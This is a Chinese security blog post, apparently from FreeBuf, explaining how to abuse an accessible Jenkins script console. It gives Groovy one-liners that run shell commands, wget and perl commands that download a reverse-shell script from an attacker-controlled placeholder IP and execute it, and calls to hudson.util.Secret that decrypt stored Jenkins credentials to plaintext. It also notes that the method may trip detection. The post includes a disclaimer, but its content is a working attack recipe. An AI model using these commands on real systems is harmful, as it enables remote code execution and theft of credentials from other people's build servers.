jenkins:利用script console
Minions010
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
jenkins:利用script console
一般我们在通过前期一些方式拿到Jenkins script console操作权限时,可以通过以下两个方式进一步利用。
1. Jenkins新建脚本控制台执行命令
进入manage Jenkins管理:
然后下滑找到脚本控制台 script console
根据语法写入执行命令:
println "ls -al /etc/".execute().text
成功执行后输出内容就会打印在下方。
注意:这种方式因为较常利用可能会被设备检测。
如果直接使用bash、nc反弹shell失败,可以使用其他语言如perl、python尝试反弹。
如使用perl,先将准备好的反弹shell文件放在自己服务器上,然后开启http监听,在script console执行下载文件的命令并执行文件即可。
:
println "wget -P /tmp http://x.x.x.x:8888/shshshsh.pl".execute().text
println "perl /tmp/shshshsh.pl".execute().text
2. jenkins凭据提取-结合script console
jenkins的credentials.xml文件中存储了很多账号(格式:
{AQAAABAAAAAgQI+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx+j5DiVg251XDjq+}),我们可以在script console通过调用内置方法解密本地保存的凭据。
这里先通过UI访问的方式从凭据-->用户-->更新处得到password,网页源码查看隐藏处,可得到加密后的密码
然后脚本控制台执行(适用于账号密码类型凭据):
println(hudson.util.Secret.fromString("{AQAAABAAAAAgQI+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx+j5DiVg251XDjq+}").getPlainText())
或使用decrypt
println(hudson.util.Secret.decrypt("{AQAAABAAAAAgQI+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx+j5DiVg251XDjq+}"))
就可解密成功输出明文。
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 Minions010 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏

相关推荐
Jenkins利用项目配置执行命令、获取凭据
2023-10-09
Jenkins :添加node权限获取凭据、执行命令
2023-08-28